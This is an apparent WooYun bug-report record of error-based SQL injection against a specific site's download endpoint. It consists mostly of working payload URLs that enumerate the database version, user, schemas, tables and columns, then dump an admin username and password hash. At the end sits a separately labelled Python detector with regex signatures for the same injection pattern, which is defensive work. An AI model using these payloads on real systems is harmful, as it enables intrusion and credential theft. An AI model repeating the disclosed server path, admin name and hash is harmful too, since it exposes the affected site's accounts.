http://www.wooyun.org/bugs/wooyun-2010-01666
I had been wanting to find one to test and did not expect there to be one here. It can be tested, so this is just a record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate databases one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361

/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
d6a8b4574ca231eb8bd52764d4978ffcd
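
A defender-side check for the requests recorded above, as an added example that is not part of the original post: it flags a non-numeric `id` path segment and the `count(*)` / `floor(rand(0)*2)` / `group by` shape that these URLs share. That the `/id/<value>/` segment should only ever hold digits is an assumption, and the function names and sample paths are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request paths (not taken from any real log).
SAMPLE_PATHS = [
    "/download/downpage/netarea/id/1600003/wapc/5000_0005_003",
    "/download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),"
    "concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables"
    "+group+by+x)a)%23/wapc/5000_0005_003",
    "/download/downpage/netarea/id/1600003%27%20OR%201=1%23/wapc/5000_0005_003",
    "/download/downpage/netarea/id/abc/wapc/5000_0005_003",
]

# Assumed route layout: .../id/<numeric value>/...
ID_SEGMENT = re.compile(r"/id/([^/]*)")
# Shape shared by the recorded requests: count(*) ... floor(rand( ... group by
DOUBLE_QUERY = re.compile(
    r"count\s*\(\s*\*\s*\).*floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S)


def normalize(path):
    """Decode twice (double encoding), map '+' to space, drop inline SQL comments."""
    decoded = unquote_plus(unquote_plus(path))
    return re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)


def classify(path):
    """Return the list of findings for one request path (empty list = clean)."""
    findings = []
    # Allow-list check on the raw path: catches any payload, known shape or not.
    m = ID_SEGMENT.search(path)
    if m and not re.fullmatch(r"[0-9]+", m.group(1)):
        findings.append("non-numeric id segment")
    text = normalize(path)
    if DOUBLE_QUERY.search(text):
        findings.append("floor(rand()) group-by error-based pattern")
    if "information_schema" in text.lower():
        findings.append("information_schema reference")
    return findings


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(classify(p) or "clean", p[:70])
```

The allow-list check on the path segment is the one that matters for blocking; the two signature checks are for triage in logs, since the parameter here travels in the URL path rather than the query string.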